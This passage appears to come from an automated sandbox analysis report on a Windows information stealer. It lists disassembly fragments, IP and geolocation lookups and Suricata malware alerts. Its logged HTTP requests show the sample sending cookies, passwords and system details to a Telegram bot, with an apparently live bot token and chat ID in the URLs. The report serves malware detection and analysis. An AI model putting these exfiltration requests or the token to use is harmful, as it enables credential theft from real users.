Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then mov ecx, 000003E8h	7_2_00B44E48
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then mov ecx, 000003E8h	7_2_00B44E39
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 00E8F45Dh	7_2_00E8F2C0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 00E8F45Dh	7_2_00E8F4AC
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 00E8FC19h	7_2_00E8F961
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then push 00000000h	7_2_00F85434
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then push 00000000h	7_2_00F86999
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then push 00000000h	7_2_00F87F17
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659E501h	7_2_0659E258
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 06590D0Dh	7_2_06590B30
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 06591697h	7_2_06590B30
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 06592C21h	7_2_06592970
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 065931E8h	7_2_06592DD0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06590673
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659E0A9h	7_2_0659DE00
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659E959h	7_2_0659E6B0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659F209h	7_2_0659EF60
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659EDB1h	7_2_0659EB08
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659F661h	7_2_0659F3B8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06590853
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_06590040
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659FAB9h	7_2_0659F810
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659D3A1h	7_2_0659D0F8
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659CF49h	7_2_0659CCA0
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659D7F9h	7_2_0659D550
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 065931E8h	7_2_06593116
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 065931E8h	7_2_06592DCA
Source: C:\Users\user\Desktop\EUYIlr7uUX.exe	Code function: 4x nop then jmp 0659DC51h	7_2_0659D9A8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0118F2D5h	12_2_0118F138
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0118F2D5h	12_2_0118F324
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0118F2D5h	12_2_0118F3A0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 06872819h	12_2_06872568
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 06870D0Dh	12_2_06870B30
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 06871697h	12_2_06870B30
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 06872F58h	12_2_06872B40
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687DE11h	12_2_0687DB68
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 06872F58h	12_2_06872E86
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687D109h	12_2_0687CE60
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_06870673
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687E269h	12_2_0687DFC0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687D9B9h	12_2_0687D710
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687EF71h	12_2_0687ECC8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687E6C1h	12_2_0687E418
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687F821h	12_2_0687F578
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687D561h	12_2_0687D2B8
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687CCB1h	12_2_0687CA08
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 06872F58h	12_2_06872B3B
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_06870040
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	12_2_06870853
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687EB19h	12_2_0687E870
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687FC79h	12_2_0687F9D0
Source: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	Code function: 4x nop then jmp 0687F3C9h	12_2_0687F120

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2008:51:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:10:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcea7e323b4b56Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcea80a4ac6638Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcef197cbf1342Host: api.telegram.orgContent-Length: 919
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Softwares%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf1f0d65aa325Host: api.telegram.orgContent-Length: 993Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcee7481a05c80Host: api.telegram.orgContent-Length: 919
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Browsers%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf4fcc4666adbHost: api.telegram.orgContent-Length: 953Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcf9b222ab101dHost: api.telegram.orgContent-Length: 560Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfbd4abc549f0Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfeb0e52279a5Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd01117777eae5Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd03f2ce7a2888Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd062e2ba8c2f6Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd0c78d1de58e2Host: api.telegram.orgContent-Length: 560Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49713 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49717 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49720 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49729 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49735 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49723 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49725 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49727 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49721 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49718 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49737 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49747 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49732 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49749 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49744 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49733 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49709 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49733 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2008:51:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:10:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
